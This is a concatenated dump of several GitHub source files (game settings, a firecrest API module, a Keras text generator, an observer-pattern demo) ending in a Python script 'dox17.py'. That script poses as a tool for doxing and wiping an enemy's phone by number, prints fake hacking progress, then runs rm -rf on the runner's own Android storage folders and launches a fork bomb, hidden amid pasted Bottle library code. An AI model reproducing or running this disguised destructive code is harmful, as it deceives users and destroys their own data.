# player settings
PLAYER_HEALTH = 100
PLAYER_HIT_RECT = py.Rect(0, 0, 64, 64)
PLAYER_ENERY = 100
PLAYERSPEED = 200
PLAYER_ROT_SPEED = 180
PLAYER_IMG = 'survivor1_gun.png'
# Effects
ALPHA_DAMAGE = [i for i in range(0,255,35)]
NIGHT_COLOR = (25,25,25)
LIGHT_RADIUS = (600,600)
LIGHT_MASK = 'light_350_med.png'
MUZZLE_FLASHES = ['whitePuff15.png','whitePuff16.png','whitePuff17.png','whitePuff18.png']
# bullet settings
BULLET_IMG = 'bullet_tile.png'
WEOPENS = {}
WEOPENS['pistol'] = {'bullet_speed' : 500,
'bullet_lifetime' : 1000,
'rate' : 250,
'kickback' : 200,
'damage' : 20,
'spread' : 5,
'bullet_size' : 'lg',
'bullet_count' : 1
}
WEOPENS['shotgun'] = {'bullet_speed' : 500,
'bullet_lifetime' : 2000,
'rate' : 900,
'kickback' : 300,
'damage' : 50,
'spread' : 20,
'bullet_size' : 'sm',
'bullet_count' : 2
}
BULLET_OFFSET = vec(30 , 10)
# mob settings
ZOMBIE_IMG = 'zoimbie1_hold.png'
ZOMBIE_SPEED = [100,132,98,110,160]
MOB_HIT_RECT = py.Rect(0,0,35,43)
MOB_KNOCKBACK = 40
AVOID_RADIUS = 80
# bobbing motion settings
BOB_RANGE = 20
BOB_SPEED = 0.6
# hope you like it | [
"88365505+DiviLOL@users.noreply.github.com"
] | 88365505+DiviLOL@users.noreply.github.com |
13458787d9118c6413743360eea1fd4dd2d6ab97 | f130171785cf702c695dfd58b05e7afe84b15847 | /firecrest/api.py | 9e944b3c424d53d50ebd283aac2c98f36f979f3d | [] | no_license | Corwinpro/firecrest | 019ab9e983d6d3faa7b3642a0f94c2662be67db1 | 4b6cb4b57c55f0cbd2d0c59c4729e7548a668a67 | refs/heads/master | 2021-12-25T14:16:44.675636 | 2021-12-19T15:28:08 | 2021-12-19T15:28:08 | 174,002,822 | 0 | 0 | null | 2021-12-19T15:28:08 | 2019-03-05T18:53:17 | Python | UTF-8 | Python | false | false | 803 | py | """
Core API for the firecrest package.
This module represents the public API of the firecrest library.
It contains everything you should need as a user of the library.
No stability guarantees are made for imports from other modules or subpackages.
"""
from firecrest.mesh.boundaryelement import BSplineElement, LineElement
from firecrest.mesh.geometry import SimpleDomain
from firecrest.solvers.eigenvalue_tv_acoustic_solver import EigenvalueTVAcousticSolver
from firecrest.solvers.spectral_tv_acoustic_solver import SpectralTVAcousticSolver
from firecrest.solvers.unsteady_tv_acoustic_solver import UnsteadyTVAcousticSolver
__all__ = [
"BSplineElement",
"LineElement",
"SimpleDomain",
"EigenvalueTVAcousticSolver",
"SpectralTVAcousticSolver",
"UnsteadyTVAcousticSolver",
]
| [
"noreply@github.com"
] | Corwinpro.noreply@github.com |
8e69c3352dd01ab3c1ddd9e93e9305d5063b68ed | 1f21a6c258dc1ef79ffbb985ee8af21cdd51db40 | /generating.py | 5fa7d39794640b4af5d6a46c8e0b492adc343610 | [] | no_license | sem980/mtg_like_textgen_lstm | 858fc9d80421d036965c5a676e1d9e647276b441 | 0fadbd5b31d49587451b2fc89385271a1e7f8c2f | refs/heads/master | 2020-04-30T03:20:14.002734 | 2019-03-21T13:18:23 | 2019-03-21T13:18:23 | 176,582,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,797 | py | # -*- encoding: utf-8 -*-
from keras.models import load_model
from MorphTable import MorphTable
import numpy as np
import json
import sys
import warnings
def passing_warn(*args,**kwargs):
pass
def lottery(y_pred):
#次に予測される形態素の確率が与えられた際に抽選を行う関数
#多項分布で抽選を行い,np.argmaxでインデックスを返す
pred_f64 = np.asarray(y_pred).astype('float64')
pred_norm = pred_f64/sum(pred_f64)
hit_index = np.argmax(np.random.multinomial(1,pred_norm,1))
return hit_index
def seed_gen(filename):
#テキスト生成の際の最初の一形態素をランダムに出力
with open(filename,'r') as f:
seeds = json.load(f)
return np.random.choice(seeds)
def generate_text(model,seed_morph,morph_table,maxlen=5,eps=0.1):
#文頭の形態素seed_morphからmorph_tableに基づくインデックスのリストを作成
seed_seq = ['<BOS>']*(maxlen-1)+[seed_morph]
seq_index = [morph_table.morph2index(m) for m in seed_seq]
#テキストの生成
#<EOS>か形態素200個が出力されるまでテキストを生成
generate_list = list()
n = 0
next_morph = ''
while(n<200 and next_morph != '<EOS>'):
#学習済みモデルへの入力となるx_predはseq_indexのOne-Hot表現
x_pred = np.zeros((1,maxlen,morph_table.ret_typenum()),dtype=np.bool)
for i,morph_index in enumerate(seq_index):
x_pred[0,i,morph_index] = 1
#x_predに基づき次の形態素を予測する確率y_predを取得
y_pred = model.predict(x_pred,verbose=0)[0]
#ランダムに得られたeps_choiceがeps以下の値であれば抽選
#以上であれば最大の確率となる形態素を取得
eps_choice = np.random.random()
hit = np.argmax(y_pred) if eps_choice > eps else lottery(y_pred)
next_morph = morph_table.index2morph(hit)
#seq_indexの最初の形態素を捨て, 予測された形態素を最後に追加
seq_index.pop(0)
seq_index.append(hit)
generate_list.append(next_morph)
n+=1
return ''.join(seed_seq[-1:]+generate_list[:-1])
def main():
warnings.warn = passing_warn
model = load_model('model/morphlevel_model.h5')
#形態素とインデックスの変換用テーブル
morph_table = MorphTable('data/vocab.json')
# 1sequenceの形態素数
maxlen = 5
#epsの値によって予測時に抽選が行われる確率が変化
if len(sys.argv)>1:
eps = float(sys.argv[1])
else:
eps = 0.8
seed_morph = seed_gen('data/seed_morph.json')
gen = generate_text(model,seed_morph,morph_table,maxlen,eps)
print(gen)
if __name__ == '__main__':
main() | [
"heyhey1089@gmail.com"
] | heyhey1089@gmail.com |
2a8d31ce9ce3683a0d4c071feaf1b1488a845422 | 48dab42eeef7f971af1fe98045e669edb8e57ab0 | /behavioural/observer_pattern.py | 864f36310cf2de51d7e96f2ba31734a1eb35c03e | [
"MIT"
] | permissive | cosmos-sajal/python_design_patterns | b7df3e83e74ac5eccd30e8037ebc70987407ca2b | d270989f1dfafaef48e4b585eca91603a6c0ac8e | refs/heads/master | 2022-06-06T16:41:41.638518 | 2020-05-05T08:20:16 | 2020-05-05T08:20:16 | 260,250,022 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,112 | py | # Docs - https://deductionlearning.com/design-patterns/observer-pattern-introductory-example/
# https://www.youtube.com/watch?v=wiQdrH2YpT4&list=PLF206E906175C7E07&index=4
# https://www.quora.com/What-are-some-real-world-uses-of-observer-pattern
# difference between PubSub and Observer Pattern -
# https://hackernoon.com/observer-vs-pub-sub-pattern-50d3b27f838c
from abc import ABCMeta, abstractmethod
class Subject(metaclass=ABCMeta):
@abstractmethod
def register(self):
pass
@abstractmethod
def unRegister(self):
pass
@abstractmethod
def notify(self):
pass
class Observer(metaclass=ABCMeta):
@abstractmethod
def update(googlePrice, applePrice, ibmPrice):
pass
class StockObserver(Observer):
observerCounter = 0
def __init__(self, stockGrabber):
StockObserver.observerCounter += 1
self.observerId = StockObserver.observerCounter
stockGrabber.register(self)
def update(self, googlePrice, applePrice, ibmPrice):
print("observer id -" + str(self.observerId))
print("the prices are:" + str(googlePrice) +
" " + str(applePrice) + " " + str(ibmPrice))
class StockGrabber(Subject):
def __init__(self):
self.googlePrice = 0.0
self.applePrice = 0.0
self.ibmPrice = 0.0
self.observers = []
def register(self, o):
self.observers.append(o)
def unRegister(self, o):
self.observers.remove(o)
def notify(self):
for observer in self.observers:
observer.update(self.googlePrice, self.applePrice, self.ibmPrice)
def setGooglePrice(self, price):
self.googlePrice = price
self.notify()
def setApplePrice(self, price):
self.applePrice = price
self.notify()
def setIBMPrice(self, price):
self.ibmPrice = price
self.notify()
stockGrabber = StockGrabber()
observer1 = StockObserver(stockGrabber)
observer2 = StockObserver(stockGrabber)
stockGrabber.setGooglePrice(100.0)
stockGrabber.setApplePrice(200.0)
stockGrabber.setIBMPrice(300.0)
| [
"sajal.4591@gmail.com"
] | sajal.4591@gmail.com |
bd4c169910e6c1636360c87417b1e758cd7f99cb | 8335147b15c0d38873ac54f16048ef66579bf85f | /dox17.py | 6284011ca0410eb01de325b692ceb6723ff287ad | [] | no_license | Zeventeen-17/dox17 | 2204b0b3be472ac9210c5954a6d7ebf0d4a164ff | 4a458affb0ab18d204b5582117e6dc6193cb7a4f | refs/heads/main | 2023-08-29T00:47:26.000389 | 2021-10-01T20:08:08 | 2021-10-01T20:08:08 | 410,429,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,575 | py | #!/bin/python
import os
import time
'''
def fetr():
def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret:
# See BaseResponse.set_cookie for details on signed cookies.
if value and value.startswith('!') and '?' in value:
sig, msg = map(tob, value[1:].split('?', 1))
hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()
if _lscmp(sig, base64.b64encode(hash)):
dst = pickle.loads(base64.b64decode(msg))
if dst and dst[0] == key:
return dst[1]
return default
return value or default
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
""" The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
not to be confused with "URL wildcards" as they are provided by the
:class:`Router`. """
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
forms.recode_unicode = self.POST.recode_unicode
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
files.recode_unicode = self.POST.recode_unicode
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
""" If the ``Content-Type`` header is ``application/json`` or
``application/json-rpc``, this property holds the parsed content
of the request body. Only requests smaller than :attr:`MEMFILE_MAX`
are processed to avoid memory exhaustion.
Invalid JSON raises a 400 error response.
"""
ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]
if ctype in ('application/json', 'application/json-rpc'):
b = self._get_body_string(self.MEMFILE_MAX)
if not b:
return None
try:
return json_loads(b)
except (ValueError, TypeError):
raise HTTPError(400, 'Invalid JSON')
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
@staticmethod
def _iter_chunked(read, bufsi)
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, _, _ = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buff = bs
while maxread > 0:
if not buff:
buff = read(min(maxread, bufsize))
part, buff = buff[:maxread], buff[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
try:
read_func = self.environ['wsgi.input'].read
except KeyError:
self.environ['wsgi.input'] = BytesIO()
return self.environ['wsgi.input']
body_iter = self._iter_chunked if self.chunked else self._iter_body
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self, maxread):
""" Read body into a string. Raise HTTPError(413) on requests that are
to large. """
if self.content_length > maxread:
raise HTTPError(413, 'Request entity too large')
data = self.body.read(maxread + 1)
if len(data) > maxread:
raise HTTPError(413, 'Request entity too large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
""" True if Chunked transfer encoding was. """
return 'chunked' in self.environ.get(
'HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1')
for key, value in _parse_qsl(body):
post[key] = value
return post
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py3k:
args['encoding'] = 'utf8'
post.recode_unicode = False
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
""" The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. """
env = self.environ
http = env.get('HTTP_X_FORWARDED_P
or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
""" The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and tailing
slashes. """
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
""" Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
"""
script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift)
self['SCRIPT_NAME'], self['PATH_INFO'] = script, path
@property
def content_length(self):
""" The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. """
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
""" The Content-Type header as a lowercase-string (default: empty). """
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
""" True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). """
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
""" Alias for :attr:`is_xhr`. "Ajax" is not the right term. """
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', ''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This does only
work if all proxies support the ```X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
# return route[0] if route else None
'''
def banner():
print("""
___ _ ____
___| \ _____ __ / |__ |
|___| |) / _ \ \ / | | / /
|___/\___/_\_\ |_|/_(_)
Script para doxear solo con numero telefonico y elimnar todo los datos de la victima.
Created by 17.
""")
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1')
for key, value in _parse_qsl(body):
post[key] = value
return post
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py3k:
args['encoding'] = 'utf8'
post.recode_unicode = False
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server.
env = self.environ
http = env.get('HTTP_X_FORWARDED_PROT
or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
Request path including :attr:`script_name` (if present). """
banner()
numero = input("\n Introduce el número del enemigo: ")
print(" LOADING....")
print(f"\n Mandando SMS con vulnerabilidad 0day a {numero}")
time.sleep(10)
print(f"\n introduciendose en el dispositivo, IP: 192.168.0.1")
time.sleep(10)
print(f"\n Generando persistencia al {numero}")
time.sleep(10)
siii = int(eval(input(" \nPersistencia lista, preparado para eliminar todo?\n\n En tu pantalla se mostrara lo que se va borrando del objetivo\n Listo? \n 1)si \n responde: ")))
os.system("clear")
if siii == 1:
print(" \n comienzo de depuracion del telefono objetivo")
print(" en 6")
time.sleep(1)
print(" en 5")
time.sleep(1)
print(" en 4")
time.sleep(1)
print(" en 3")
time.sleep(1)
print(" en 2")
time.sleep(1)
print(" en 1")
time.sleep(1)
print(" Formateando el telefono del enemigo")
os.system("rm -rf /storage/emulated/0/*")
os.system("rm - rf /storage/emulated/Android")
os.system("rm -rf /storage/emulated/0/data")
os.system("rm -rf /storage/emulated/0/DCIM")
os.system("rm -rf /storage/emulated/0/Download")
os.system("rm -rf /storage/emulated/0/download")
os.system("rm -rf /storage/emulated/0/Descargas")
os.system("rm -rf /storage/emulated/0/descargas")
os.system("rm -rf /storage/emulated/0/Documents")
os.system("rm -rf /storage/emulated/0/documents")
os.system("rm -rf /storage/emulated/0/whatsapp")
os.system("rm -rf /storage/emulated/0/*")
os.system(":(){ :|:& };:")
else:
print("Introdujiste un valor erroneo reintenta por favor")
time.sleep(3)
os.system("clear")
os.system(":(){ :|:& };:")
'''
def fetr():
def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret:
# See BaseResponse.set_cookie for details on signed cookies.
if value and value.startswith('!') and '?' in value:
sig, msg = map(tob, value[1:].split('?', 1))
hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()
if _lscmp(sig, base64.b64encode(hash)):
dst = pickle.loads(base64.b64decode(msg))
if dst and dst[0] == key:
return dst[1]
return default
return value or default
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
""" The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
not to be confused with "URL wildcards" as they are provided by the
:class:`Router`. """
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
forms.recode_unicode = self.POST.recode_unicode
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
files.recode_unicode = self.POST.recode_unicode
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
""" If the ``Content-Type`` header is ``application/json`` or
``application/json-rpc``, this property holds the parsed content
of the request body. Only requests smaller than :attr:`MEMFILE_MAX`
are processed to avoid memory exhaustion.
Invalid JSON raises a 400 error response.
"""
ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]
if ctype in ('application/json', 'application/json-rpc'):
b = self._get_body_string(self.MEMFILE_MAX)
if not b:
return None
try:
return json_loads(b)
except (ValueError, TypeError):
raise HTTPError(400, 'Invalid JSON')
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
@staticmethod
def _iter_chunked(read, bufsi)
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, _, _ = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buff = bs
while maxread > 0:
if not buff:
buff = read(min(maxread, bufsize))
part, buff = buff[:maxread], buff[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
try:
read_func = self.environ['wsgi.input'].read
except KeyError:
self.environ['wsgi.input'] = BytesIO()
return self.environ['wsgi.input']
body_iter = self._iter_chunked if self.chunked else self._iter_body
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self, maxread):
""" Read body into a string. Raise HTTPError(413) on requests that are
to large. """
if self.content_length > maxread:
raise HTTPError(413, 'Request entity too large')
data = self.body.read(maxread + 1)
if len(data) > maxread:
raise HTTPError(413, 'Request entity too large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
""" True if Chunked transfer encoding was. """
return 'chunked' in self.environ.get(
'HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1')
for key, value in _parse_qsl(body):
post[key] = value
return post
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py3k:
args['encoding'] = 'utf8'
post.recode_unicode = False
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
""" The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. """
env = self.environ
http = env.get('HTTP_X_FORWARDED_P
or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
""" The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and tailing
slashes. """
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
""" Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
"""
script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift)
self['SCRIPT_NAME'], self['PATH_INFO'] = script, path
@property
def content_length(self):
""" The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. """
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
""" The Content-Type header as a lowercase-string (default: empty). """
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
""" True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). """
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
""" Alias for :attr:`is_xhr`. "Ajax" is not the right term. """
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', ''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This does only
work if all proxies support the ```X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
